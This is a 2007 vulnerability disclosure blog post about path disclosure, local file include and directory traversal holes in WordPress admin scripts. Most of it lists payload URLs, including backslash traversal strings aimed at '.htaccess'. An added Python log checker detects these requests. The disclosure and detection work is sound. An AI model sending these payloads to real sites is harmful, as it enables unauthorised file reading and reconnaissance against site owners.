Local file include, Directory traversal and Full path disclosure in WordPress

23:43 30.12.2007

I will continue publishing the numerous vulnerabilities in WP on the Day of bugs in WordPress. I have written about some similar vulnerabilities before.

In December, on 22.12.2007, I found Local file include, Directory traversal and Full path disclosure vulnerabilities in WordPress. The holes are in the files index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (in the page parameter), and also in the files admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

These scripts are vulnerable to an attack that uses the backslash (which works only on Windows).

Local file include and Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Vulnerable are WordPress versions <= 2.0.11 and potentially later versions (2.1.x, 2.2.x and 2.3.x).
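
An added example, not part of the original post or of WordPress: a log check for the two request shapes listed above, an empty `page` value and a `page` value containing a `..` segment bounded by either `/` or `\`, including percent-encoded backslashes. It assumes Apache-style access log lines; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A ".." path segment bounded by either separator; "/"-only filters miss "\..\".
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %5C or %255C."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return 'traversal', 'empty-page' or None for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if '/wp-admin/' not in url.path:
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != 'page':
            continue
        if TRAVERSAL.search(fully_decode(value)):
            return 'traversal'
        if value == '':
            return 'empty-page'   # the path-disclosure form listed above
    return None

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    r'192.0.2.10 - - [30/Dec/2007:23:43:00 +0200] "GET /wp-admin/index.php?page=\..\..\.htaccess HTTP/1.1" 200 512',
    r'192.0.2.10 - - [30/Dec/2007:23:43:05 +0200] "GET /wp-admin/users.php?page=%255C..%255C..%255C.htaccess HTTP/1.1" 200 512',
    r'192.0.2.10 - - [30/Dec/2007:23:43:09 +0200] "GET /wp-admin/options.php?page= HTTP/1.1" 200 300',
    r'192.0.2.77 - - [30/Dec/2007:23:44:00 +0200] "GET /wp-admin/admin.php?page=akismet/akismet.php HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    labelled = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, label) for n, label in labelled if label]

if __name__ == '__main__':
    for n, label in scan(SAMPLE_LOG):
        print(n, label)
```

The ordinary plugin page request on the last sample line is not flagged, so the check can run over live logs without matching normal admin navigation.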


2 responses to “Local file include, Directory traversal and Full path disclosure in WordPress”

  1. Mefesto says:

    It was interesting, thanks.

  2. MustLive says:

    Mefesto

    You are welcome.
